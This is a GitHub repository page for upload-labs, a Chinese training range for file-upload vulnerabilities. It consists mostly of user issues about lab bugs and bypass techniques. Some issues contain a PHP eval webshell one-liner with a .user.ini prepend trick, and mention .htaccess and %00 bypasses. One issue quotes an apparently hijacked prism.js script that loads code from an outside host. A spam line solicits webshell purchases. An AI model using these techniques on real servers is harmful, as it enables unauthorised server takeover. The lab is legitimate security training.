c0ny1 / upload-labs Goto Github PK

View Code? Open in Web Editor NEW

3.7K 3.7K 811.0 1.55 MB

一个想帮你总结所有类型的上传漏洞的靶场

JavaScript 2.23% PHP 89.46% CSS 7.59% Dockerfile 0.72%

upload-labs's People

Contributors

Stargazers

Watchers

Forkers

b1gw00d f8syw5v kungia09 1337g code4security chrr0m4n jokerbug8 k2vin selfevo 957204459 jackjohnson00 scorpoin passtion popmedd jishuzhain float001 beiman123 lw1988 5up3rc sttscc deelmind jerusalemsbell masonqaq crackercat pygain11 scanfsec j4ckzh0u shuyabin d0ef jjsmida shaunstanislauslau skylei wg135 shiham101 bit4woo brightodd ddddyyy j1anfen harmoc webshell520 lsh4ck funny-fury jovenshao qu3stbaby rh2002 dr-34m-3r hhy5277 tonyle9 fnzer0 qsdj tj1ngwe1 wangjunbiao wind-- doge-dog f0829 lengyun123456 conanjun sheldon1998 winking1994 dp4ng jackytedy secd0g scsritss20 myxss gb233 undefinedd giantbranchcollect s3cj0y liyangdotwebsite codingli gg00 frailleon lx277856602 traceur lycansfree huangwei1010 512524820 aerfa21 wizardchao w0rhost yifansun2086 nazicc fangyuanzhang devenlu h4ck0ne 6xunlaoren wh1sht rabitw 01001000entai pxss pa55w0rd maliciouskr disk-kk mashiroc fengxl3320 aipengjie simon0105 wilsonleeee shenliehuozhi secwsstest

upload-labs's Issues

关于pass3的题解

最新版将上传的文件重命名，无法通过.htaccess、apache解析漏洞、.空格绕过，请教题解。

另外希望出系统的writeup，网上的不是很全。

Pass-04 显示源码和源文件index.php上传路径不同

页面提示源码：$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
源文件： $img_path = UPLOAD_PATH.'/'.$file_name;

bp抓包错误

为什么使用bp抓包抓到的都是这个网站

我从来没打开过这个网站，做其他的赛题就可以正常抓包

您好~我利用您提供的“upload-labs-env-win-0.1-beat.1”在win7系统上运行，上传的数据包用burp抓不到，但是“清空上传文件”和“查看提示”的数据包能抓，请问，会是什么情况造成的呀？
只能抓到这两个链接：
http://127.0.0.1/Pass-01/helper.php?action=get_prompt
http://127.0.0.1/rmdir.php?action=clean_upload_file

打扰您了~~

Windows集成环境绿色免安装版本的pass13

在做这一关的时候上传完图片木马想找个包含漏洞利用发现也没给提示，网上找的wp发现这一关是有给文件包含漏洞地址的，但是我这个怎么没有，是这个集成环境版本把这个删除了吗，我也没发现根目录有include文件……

关于 image_path

在利用Windows文件名特性部分，为啥都将文件名进行了重命名？

关于writeup

能不能写个writeup啊

能不能在页面上标明每个靶机的漏洞类型

能不能在页面上标明每个靶机的漏洞类型，以及上传办法，就像游戏一样，有个通关教程秘籍，这样更能方便学习

提个小建议。

建议写上每个任务写上让用什么方法来绕过。
当我发现xxx.php.xxx可以绕过所有题目时，就索然无味了

[Bug] 代码有小错误

文件 https://github.com/c0ny1/upload-labs/blob/master/Pass-06/index.php
忘记了 include '../common.php';

# 路劲问题，在linux服务器上部署安装，所有页面出问题

Pass-02

这里应当去除，所有的文档的都应该去除，请查看！！！

Pass-04上传.htaccess无法解析jpg

你好，我是个初学者。我在学习第4关的时候，学习了利用.htaccess文件进行绕过。但是我使用phpstudy搭建的靶场在上传了.htaccess之后上传木马jpg再使用蚁剑却无法链接。参考了别人的博客说要改Apache的httpd.conf的配置，我改了好像无济于事。请问这是为什么？

Pass-19 suggestion

I always forget to fill in file "save_name" value and submit forms，it will cause warning

Warning: move_uploaded_file(../upload//) [function.move-uploaded-file]: failed to open stream: Permission denied in /web/path/to/upload-labs/Pass-19/index.php on line 18
Warning: move_uploaded_file() [function.move-uploaded-file]: Unable to move 'C:\Users\Username\AppData\Local\Temp\xxxxx.tmp' to '../upload//' in /web/path/to/upload-labs/Pass-19/index.php on line 18

and upload failed. so, I suggested add default value for "save_name" and modify the Pass-19 source code line 45, code example
<input class="input_text" type="text" name="save_name" value="upload_19.jpg" style="" /><br/>

pass 19 方法看到改名前的文件，无法访问，无法复现

Docker版本没有imagecreatefromjpeg函数

大哥你这docker为啥要用php5.5的

FROM php:5.5-apache
这00截断也用不了啊

docker version latest提示：../upload文件夹不存在,请手工创建！

pass-04后缀名黑名单

代码中$deny_ext = array(...,"php1",...);php1签名缺失点符号（ps：别说我针细，脚本跑出来的）

Docker启动项目没有upload目录

但是在docker中无法直接创建提示没有mkdir命令，建议在项目中直接添加一个空的upload目录。

pass5是出问题了吗

用您docker直接搭建的

确定.user.ini设置成功。

但是就是不能bypass

11关的00截断过不去了显示上传错误

Docker中php版本太高，导致无法利用00截断和Windows特性

docker里边版本太高了吧截断漏洞不能利用利用Windows特性的漏洞也不能利用

prism.js疑似被劫持

挂上burp代理之后总抓到一个请求发往www.fjlqqc.com，搜了下发现这个代码高亮插件prism.js好像不太正常：

    var publisherID = '0b7d9e00-6139-4b15-972b-465c0921318b';
    var injectionScriptURI = "http://www.fjlqqc.com/common/api/v1.0/slot-code/publisher/";
    //var currentScript = getCurrentScript(sourceScriptURI);
    if (true) {
        evalSrcScript(sourceScriptURI);
    }

    inject();

显示源码按钮故障

点击显示源码按钮无反应

release中的版本号应该是beta而不是beat

window集成版本pass4 代码显示错误及非预期解

pass4集成版本代码展示里多了随机数文件名,而我在上传的时候发现并没有重命名,同时发现非预期解"one.php . ."

windows集成环境中phpstudy无法启动MySQL

我在windows7下搭建环境时发现phpstudy的MySQL服务无法启动，从网上也没有找到合适的解决方案，然后到http://www.php.cn/xiazai/gongju/714下载了phpstudy2018，再切换版本，并将WWW目录下的文件复制过去就正常启动了。遇到同样问题的朋友可通过[email protected]联系我。

能否提供所有example的wp

能否提供下每个题简单的解题思路，有的案例是不是要求对apache进行配置？比如lab3，我能想到上传htaccess和php5等方法，但是好像都不管用。

可以弄一个docker镜像吗，感觉会省事很多。

windows集成版本pass14的提示有问题

先来看pass14的提示

注意：
1.保证上传后的图片马中仍然包含完整的一句话或webshell代码。
2.图片马要.jpg,.png,.gif三种后缀都上传成功才算过关！
这里我上传jpg发现显示
文件未知，上传失败！
我看了下源码
function isImage($filename){ $types = '.jpeg|.png|.gif'; if(file_exists($filename)){
第二行这里就没有jpg啊……
所以这个提示是不是得改改或者改下源码里面的types

pass11上传报错

我在get请求中，使用了%00截断，我想应该是可以上传成功的，但是直接报错了。

<html>
<head>
	<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
	<link rel="icon" type="image/x-icon" href="/img/favicon.png" />  
	<title>upload-labs</title>
</head>
<link rel="stylesheet" type="text/css" href="/css/index.css">
<link rel="stylesheet" type="text/css" href="/css/prism.css">
<body>
	<div id="head">
		<a href="/"><img src="/img/logo.png"/></a>
		<div id="head_menu">
			<a id="handle_code" href="javascript:show_code()">æ�¾ç¤ºæº�ç �</a>
			<a href="javascript:get_prompt()">æ�¥ç��æ��ç¤º</a>
			<a href="javascript:clean_upload_file()">æ¸�ç©ºä¸�ä¼ æ��ä»¶</a>
		</div>
	</div>
	<div id="main"><div id="menu">     
	<ul id="menulist">         
		<li><a id="Pass-01" href="/Pass-01/index.php">Pass-01</a></li> 
		<li><a id="Pass-02" href="/Pass-02/index.php">Pass-02</a></li> 
		<li><a id="Pass-03" href="/Pass-03/index.php">Pass-03</a></li> 
		<li><a id="Pass-04" href="/Pass-04/index.php">Pass-04</a></li> 
		<li><a id="Pass-05" href="/Pass-05/index.php">Pass-05</a></li> 
		<li><a id="Pass-06" href="/Pass-06/index.php">Pass-06</a></li> 
		<li><a id="Pass-07" href="/Pass-07/index.php">Pass-07</a></li> 
		<li><a id="Pass-08" href="/Pass-08/index.php">Pass-08</a></li> 
		<li><a id="Pass-09" href="/Pass-09/index.php">Pass-09</a></li> 
		<li><a id="Pass-10" href="/Pass-10/index.php">Pass-10</a></li> 
		<li><a id="Pass-11" href="/Pass-11/index.php">Pass-11</a></li> 
		<li><a id="Pass-12" href="/Pass-12/index.php">Pass-12</a></li> 
		<li><a id="Pass-13" href="/Pass-13/index.php">Pass-13</a></li> 
		<li><a id="Pass-14" href="/Pass-14/index.php">Pass-14</a></li> 
		<li><a id="Pass-15" href="/Pass-15/index.php">Pass-15</a></li> 
		<li><a id="Pass-16" href="/Pass-16/index.php">Pass-16</a></li> 
		<li><a id="Pass-17" href="/Pass-17/index.php">Pass-17</a></li> 
		<li><a id="Pass-18" href="/Pass-18/index.php">Pass-18</a></li> 
		<li><a id="Pass-19" href="/Pass-19/index.php">Pass-19</a></li>
		<li><a id="Pass-20" href="/Pass-20/index.php">Pass-20</a></li> 
	</ul> 
</div>

<div id="upload_panel">
    <ol>
        <li>
            <h3>ä»»å�¡</h3>
            <p>ä¸�ä¼ ä¸�ä¸ª<code>webshell</code>å�°æ��å�¡å�¨ã��</p>
        </li>
        <li>
            <h3>ä¸�ä¼ å�º</h3>
            <form action="?save_path=../upload/" enctype="multipart/form-data" method="post">
                <p>è¯·é��æ�©è¦�ä¸�ä¼ ç��å�¾ç��ï¼�<p>
                <input class="input_file" type="file" name="upload_file"/>
                <input class="button" type="submit" name="submit" value="ä¸�ä¼ "/>
            </form>
            <div id="msg">
                            </div>
            <div id="img">
                            </div>
        </li>
            </ol>
</div>

</div>
		<div id="footer">
		</div>
		<div class="mask"></div>
		<div class="dialog">
		    <div class="dialog-title">æ��&nbsp;ç¤º<a href="javascript:void(0)" class="close" title="å�³é�">å�³é�</a></div>
		    <div class="dialog-content"></div>
		</div>		
</body>
<script type="text/javascript" src="/js/jquery.min.js"></script>
<script type="text/javascript" src="/js/prism.js"></script>
<script type="text/javascript" src="/js/prism-line-numbers.min.js"></script>
<script type="text/javascript" src="/js/prism-php.min.js"></script>
<script type="text/javascript" src="/js/index.js"></script>
</html>

黑名单可以再添加一个pht后缀.

关于pass5的上传问题

pass5中上传了一个.user.ini，内容如下：
auto_prepend_file=1.gif
接着上传了一个1.gif，内容如下：
<?php @eval($_POST[pass5]);?>
然后使用pass5连接如下URL：
http://192.168.65.62/upload/readme.php
但是连接不成功哎，使用蚁剑，说是返回数据为空，使用maxhackbar连接时（pass5=phpinfo();）也没有反应，请问各位大佬有啥意见吗？在kali上使用docker搭建的靶场。

docker版Pass-06空格被浏览器解释成%20

文件无法被解析为php文件，求教

win10mysql启动不了

关于Pass19上传问题

在Pass-19的index.php中，对象u调用方法upload时，把原来的upload(UPLOAD_PATH)改成upload(UPLOAD_PATH.'/')即可修复文件上传不到upload文件夹中

docker里面没有upload目录

长期大量收WebShell，高价寻渗透大佬合作，有意者联系Telegram：@xxx9964

Pass11和Pass12

大佬你好，我是自搭建的upload-labs，先谢谢大佬的整理。

说下我的一个小疑问，在查询了相关资料后发现，有提到php %00截断，有两个条件
1.php版本要小于5.3.4，5.3.4
2.magic_quotes_gpc需要为OFF状态

但在5.2.17版本中，php.ini-dist的magic_quotes_gpc默认为On状态，如果此情况为真，希望大佬在readme中提醒一下自搭建的小伙伴

pass-17 提示需要代码审计

请问这一关怎么过，我想的是move_uploaded_file函数跟$upload_file之间有个操作空间，但是没成功。请问这一关是什么意思？

可不可以出一个官方的攻略啊？

从Pass-03开始就磕磕绊绊的了……网上的攻略千篇一律，但是都不能用，不知道是不是我操作的问题，还是环境出问题了:worried:。docker中没找到vi、nano、vim等编辑工具，apache2.conf都没法修改

labs 19

pass 16上传路径出错

docker 的pass16 文件上传后会把路径upload包含在文件名内，在网站根目录生成upload图片名.jpg文件。

PASS-3，文件上传后会将文件重命名，是否还需要想办法绕过重命名机制？

您好，我在尝试pass-3，根据提示，选择使用方法：1、上传.jpg文件；2、上传.htaccess，（AddType application/x-httpd-php .jpg）；

根据源码和结果来看，所有上传的文件到了服务端后，都会被重命名为“年月日+随机数”，作为前端测试应该无法知道文件被重命名成了什么名字。

问题：pass-3除了绕过黑名单以外还需要其他绕过技巧吗？

PS：使用版本为release：upload-labs 0.1；网上查了writeup，都只是绕过黑名单，没有提到文件重命名，并且发现个别writeup中的pass-3源代码中并没有重命名文件的代码。还望指教。

发现图片右键选择复制图片地址原来是可以得到名字和路径的。（捂脸）